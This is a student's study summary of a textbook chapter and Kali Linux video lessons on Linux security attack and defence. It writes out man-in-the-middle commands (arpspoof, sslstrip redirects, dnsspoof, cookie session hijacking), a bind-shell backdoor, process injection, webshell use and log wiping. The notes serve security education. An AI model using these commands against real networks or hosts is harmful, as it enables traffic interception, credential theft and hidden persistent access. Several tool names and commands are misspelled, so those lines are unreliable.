Textbook learning summary
Linux basic framework
1. Linux advantages: cross-platform hardware support, rich software support, multi-user multi-tasking, reliable security, good stability, and perfect network functions.
2. System structure: kernel, some GNU runtime libraries and tools, command-line shell, graphical interface, X window system and corresponding desktop environment, and include many applications.
3. Functional modules: process and thread management mechanism, memory management mechanism, file system management mechanism, device control mechanism (character device, block device and network device), network mechanism, system call mechanism (software interrupt implementation)
linux security mechanism
1. Identity authentication mechanism:
User (Root user, common user, system user)
User group (a collection of user accounts with the same characteristics)
Local login user authentication mechanism: DES algorithm (early), MD5, blowfish; SHA-256 and SHA-512 (now); SALT encoding length extended to 12 characters
Remote login user authentication mechanism: SSH provides two user authentication mechanisms (the first is password-based authentication; the second is asymmetric key-based authentication)
Unified identity authentication middleware - PAM: four management interfaces (authentication management, account management, password management, session management)
2. Authorization and access control mechanism
System security model: file owner, file access permissions (R, W, X) and some special permission bits for system authorization and access control (SUID and SGID permissions)
Shortcomings and improvements: unable to subdivide permission control, POSIX ACLS for linux kernel patch package
3. Security Audit Mechanism
Log subsystem: connection time log, process statistics log, error logging
Audit Daemon
Audit log analysis tools: OSSEC, Snare
Linux remote attack and defense technology
1. Four methods: guessing and attacking the user passwords involved in the identity authentication process of various network services of the Linux system, exploring the security loopholes of a monitoring network service in the Linux system, sending fraudulent emails through web Trojans, and providing Trojan horses Programs and other technical and social engineering methods, when the Linux system is used as a router connecting multiple networks, or when the "promiscuous mode" is turned on to implement network sniffing, it may be attacked by packets specially constructed by the attacker, and the attacker may be attacked by the attacker. Gain access.
2. Remote password guessing attack: SSH, telnet, FTP, HTTP
Tools: Brutus (remote password guessing tool), THC Hydra (network identity password guessing tool), Cain and Abel
Prevention: Use strong passwords; use strict password management systems and measures for security-sensitive servers; run vulnerable services on non-standard ports; password guessing defense software (Denyhosts, blockhosts, etc.), firewall IPTables.
3. Network service remote penetration attack: The most important attack channel for system penetration: penetration and utilization of monitoring network service security vulnerabilities.
4. Security vulnerability information base: CVE, Bugtraq, Security Focus, OSVDB
5. Remote penetration attack against network services of linux system
6. Vulnerabilities in the implementation of the network protocol stack in the kernel
7. Network services in the LAMP Web site construction solution: Apache——HTTP/HTTPS; Mysql——WEB background data storage; PHP——application
8. FTP (TCP 20/TCP 21), Samba (TCP 445) and other file sharing services: FTP (ProFTPD, vs-ftpd)
9. Email sending and receiving service: Sendmail service
10. Other services: OPENSSH, OPENSSL, NFS, etc.
11. Preventive measures: strong passwords, disable unnecessary services, select safe network protocols and service software, update network service versions in time, use xinetd, firewall to add network access control mechanism for linux network services, establish intrusion detection and emergency response planning process.
12. Attack linux client programs and users:
Attack client programs on linux platforms: web browser firefox, email client software thunderbird
Attacking Linux system users: Designing deception scenarios in email and instant messaging, and leaking service configuration information
Prevention: The software automatically follows the new mechanism to improve its anti-spoofing ability
13: Attack routers and listeners:
Attack routers and firewalls: ip_forward=1
net subsystem: route.c (router address recording and packet forwarding), netfilter (configure firewall)
Attack listeners and intrusion detectors (libpcap, tcpdump, wireshark, snort)
Prevention: Be aware of the security and availability of your network and security devices, be on the attacker's side, master penetration testing tools
Linux local security attack and defense technology
1. Local privilege escalation: crack the root user's password, and then execute the su or sudo command for elevation; discover and exploit security vulnerabilities in su or sudo programs; attack user-mode SUID privilege escalation vulnerabilities; attack Linux kernel code privilege escalation vulnerabilities; by searching the system for globally writable sensitive file and directory locations and exploiting them
2. User password cracking: record line format in shadow file
Login Name, Password, Last Modified Time, Minimum Interval Time, Maximum Interval Time, Warning Time, Inactivity Time, Expiration Time.
Tool: John the ripper
Method: dictionary attack, brute force cracking
3. The prerequisite for cracking Linux is to obtain the /etc/shadow file
Privilege escalation using sudo flaws
Elevation of Privilege Exploiting Userland SUID Program Vulnerability
Local buffer overflow attack (Ettercap) against SUID programs
Symbolic link attack against SUID programs (Ncpfs - ncpmount)
Race condition attack against SUID programs (Exim)
Shared library attack against SUID programs
Elevation of Privilege Exploiting Kernel Space Code Vulnerability
Prevention: Reasonably set SUID privileged programs, pay attention to security vulnerabilities in the kernel code, securely configure the system, apply SELinux and other security enhancement modules, and stand-in for anti-intrusion protection levels
linux intrusion wipes out the trail
1. Change the current activity log, clear the login log (WZAP tool), and clear your input command history in the shell program
2. Backdoor programs: Trojanized system programs (always accept the login account configured by the attacker), command-line backdoor tools, and graphical backdoor tools (VNC)
Video learning summary
SET exploited by kali
1. Open source, Python-driven social engineering penetration testing tool, richer attack vector library (combined with metaspolit)
2. Enter setoolkit on the command line to open the SET suite
3. Input 1 (Social Engineering)
Spear phishing attacks, website attacks, media infection attacks, creating payloads and listening, mass email attacks, Arduino-based attacks, SMS spoofing attacks, wireless access point attacks, QR code attacks, powershell attacks, third-party modules
4. Select spear phishing attack: Purpose: To send phishing emails with malware, the corresponding payload can choose different vulnerabilities.
5. Network attack framework: open the webserver service, and implant backdoors if the other party accesses and there are system vulnerabilities
6. Media infection attack: use Autorun.inf to execute Exploit to get a return shell, and it can also be combined with the backdoor of Metasploit
7. Create Payload and Listener
8. Mass email attack: Support importing lists and sending emails to everyone in the list
9. Arduino-Based Attacks: Hardware Modules
10. SMS spoofing: sending fake SMS messages
11. Wireless access point attack: A wireless access point attack will create a virtual wireless AP, through which all incoming device traffic can be captured
12. Two-dimensional code attack: Fill in a dangerous url to make the attacker scan the two-dimensional code.
13. Powershell attack: Powershell attack module for Vista and above
14. Fast-track attack module
kali sniffing spoofing and man-in-the-middle attack
1. Enable port forwarding for Kali settings
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
2. Set ssltrip: In order to hijack SSL data, https data needs to be changed to http: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081
Let sslrtip listen on port 8081: sslstrip -l 8081
3. Preparation of ettercap:
ettercap is a suite of tools for man-in-the-middle attacks. As famous as the dsniff suite. Support plug-ins and filtering scripts, directly display account and password without manual data extraction. If it is the first man-in-the-middle attack operation, then configure the etteracp under kali.
The configuration file is /etc/ettercap/etter.conf. First, change ec_uid and ec_gid to 0
Then find the line if you use iptables under the linux category, remove the comment ("#"), and turn on forwarding
4. Ettercap use: Open ettercap, select sniff option - unified sniffing - select network card - hosts option: scan for hosts first, and select host list after scanning
5, Dsniff suit introduction
Dsniff suit is mainly arpspoof and dsniff, the former is used for arp spoofing, the latter is used for sniffing. The attack steps are as follows:
Perform arp spoofing: arpspoof [-i interface (network card)] [-c own|host|both (spoofing method, usually both)] [-t target (target)] [-r] host (gateway)
Sniff: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]
6. Session hijacking
Here we mainly use cookies as an example to illustrate the usage of session hijacking.
Start arp spoofing: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
Capture datagram: tcpdump -i wlan -w test.cap
After a while, it is estimated that the target will log in to the website, and we start processing the captured packets:
forret -r test.cap
If there is no problem with the captured packets, and it is determined that port forwarding is enabled, the processed packets will automatically generate hamster.txt
Next running hamster hamster will prompt the browser to set the proxy to http://127.0.0.1:1234
Then open hamster in the browser:
http://hamster Select the target and possible login authentication address, and then click the link to find that the hijacking is successful .
7. Picture interception
Using Driftnet, we can see pictures of victims visiting websites.
First, still use arpspoof to start arp spoofing, and then start driftnet: driftent -i
At this time, a small window pops up. When the target visits a website with pictures, the attacker can see it in this small window.
8. DNS spoofing
Using the dnsspoof in the Dsniff suite or the dnsspoof plug-in of ettercap, we can complete the dns spoofing of the victim.
Before we start cheating, first we need to edit a own hosts file and put it in a place that is easily accessible. The content is similar to the content of the hosts that come with the machine, just write the domain name you want to deceive and the address where you want to deceive (usually the server designated by the attacker to perform browser overflow or java applet attacks, to gain access to the victim's computer)
host file: 127.0.0.1 www.baidu.com
The above is an example of a hosts file, which directs Baidu to this machine. We save it as hosts, located in the /root directory.
Then start dnsspoof: dnsspoof -i wlan0 -f /root/hosts and other victims visit Baidu to observe the effect
9. URL monitoring
Using the urlsnarf tool in the Dsniff package, we parse the HTTP communication of TCP80, 3128, and 8080 ports, and can dump all sniffed HTTP requests into a common log format (Common Log Format, CLF), This format is used by many web servers, such as IIS and Apache, and it is very convenient to use some log analysis tools to analyze and record the results afterwards.
10. Download software monitoring
Using the filesnarf tool in the Dsniff suite, we can select a file from the sniffed NFS communication and dump it to the local current working directory.
kali permission maintenance
1. There are three subclasses of Tunnel toolset, Web backdoor, and system backdoor. The system backdoor and the web backdoor are collectively referred to as backdoors
2. Weevely: python, webshell tool, kitchen knife replacement tool under linux (limited to PHP)
Generate a backdoor, upload the backdoor to the web and use the weevely connection to get a webshell
3. WeBaCoo: A small, hidden php backdoor that provides a terminal that can connect to a remote web server and execute php code. WebaCoo uses HTTP response headers to transmit command results, and shell commands are base64 encoded and hidden in cookies.
Generate a webshell, upload it to the website and connect with webacoo, by adding (execute local commands), without adding (execute commands with webshell)
4. Cymothoa system backdoor:
enumerate /bin/bash.pid (ps aux | grep "/bin/bash -k password")
cymothoa -p 10500 -s -0 -y 2333 (inject port 2333), if successful, you can connect to port 2333 and return a shell
5. dbd/sbd: understood as the encrypted version of nc
Listening side: dbd -l -p 2333 -e /bin/bash -k password
Attacker: dbd 127.0.0.1 2333 -k password
6. U3-Pwn: For mobile CD-ROM devices such as CD-ROM images, U disks, etc.
7. Intersect: Create scripts, add modules, add functional components freely, and generate a shell
Tunnel for Privilege Maintenance
1. The Tunnel toolset contains a series of tools for establishing communication tunnels and proxies
2. CryptCat
Netcat is familiar to everyone. It is known as the Swiss Army Knife in network tools, but the tunnel established by itself is not encrypted, so there is cryptcat. Similar to using dbd/sbd.
3. DNS2TCP: DNS tunnel is DNS channel. From the name point of view, it uses the DNS query process to establish a tunnel to transmit data.
In public places such as hotels, there is usually a wifi signal, but when you visit the first website, a window may pop up, you need to enter the user name and password, and then you can continue to surf the Internet after logging in (this technology is generally a transparent http proxy). However, sometimes it is found that the obtained dns address is valid and can be used for dns query. At this time, DNS tunnel technology can be used to achieve free Internet access.
The DNS tunnel principle
allows the DNS server in the local area network to forward data for us through a specific server. There are many tools implemented by DNS tunnel, such as: OzymanDNS, tcp-over-dns, heyoks, iodine, dns2tcp
4、Iodine
5. Miredo: A network tool, mainly used for IPV6 Teredo tunnel conversion of BSD and Linux. It can convert network connections that do not support IPV6 to IPV6. The kernel needs to have IPV6 and TUN tunnel support.
6. Proxychains: A tool is often used in intranet penetration testing. For example, we use Meterpreter to open a Socks4a proxy service. By modifying the /etc/prosychains.conf configuration file and adding a proxy, other tools such as sqlmap and namp can be directly used. Use a proxy to scan the intranet.
Such as proxychain namp 10.0.0.1/24
7. Proxytunnel: You can connect to a remote server through a standard Https proxy, which is a proxy that implements the function of bridging. Specifically for Http(s) transport over SSH
Prosytunnel can be used to: create a communication channel using an http(s) proxy (http connect command) Write a client driver for OpwnSSH, and create an http(s) proxy based on SSH connections
as a Standalone application that can connect to remote servers
8. Ptunnel: Establish tunnel communication with ICMP packets
9. Pwant: communicate via UDP under the intranet
10. Socat: can forward data on different protocols
11、slh:
A ssl/ssh port multiplexing tool, sslh can accept https, ssh and openvpn connections on the same port. This makes it possible to connect to ssh server or openvpn server through port 443 and provide https service on this port. sslh can be used as an example to study port multiplexing
Kali reverse engineering tool
1. Includes debuggers, decompilers and other reverse toolsets
2. Edb-Debugger: A binary debugging tool developed based on Qt4, mainly to align with the OllyDbg tool. The function can be expanded through the plug-in system. Currently, only Linux is supported.
3. Ollydbg: The classic Ring3-level debugger is a dynamic debugging tool that combines IDA with SoftICE. Under Kali is the OD running in Wine mode
4. Jad: Decompilation tool for Java
5. Radare2: An open source reverse engineering platform that supports disassembly, debugging, analysis and manipulation of binary files, including rabin2, radiff2, rasm2 and other tools
6. Recstudio: Read executable files of windows, linux, mac os x or raw and try to present code and data in c
7. Apktool: APK compilation tool provided by GOOGLE, which can disassemble or recompile apk, and install the framework-res framework required by apk
8. clang, clang++: Clang is a lightweight compiler for C, C++, Objective C++ languages
9. D2j-dex2jar: decompile the dex file to the jar file, and then you can use other tools to view the source code
10. flasm: directly modify the script actionscript in the swf file. The software that converts swf to fla file cannot ensure 100% restoration. If you only modify the as script code, flasm is the best choice, because it only modifies the script, and the resource data is not modified. . At present, flasm supports cracking swf files in flash8 and below format.
11. Javanoop: A java application security testing tool that allows you to intercept, tamper with data and hack java applications running on your computer. Can't test without source code.
Allows you to attach directly to a running process, similar to a debugger, and then immediately tamper with method calls, run custom code, or just monitor what's going on in the system.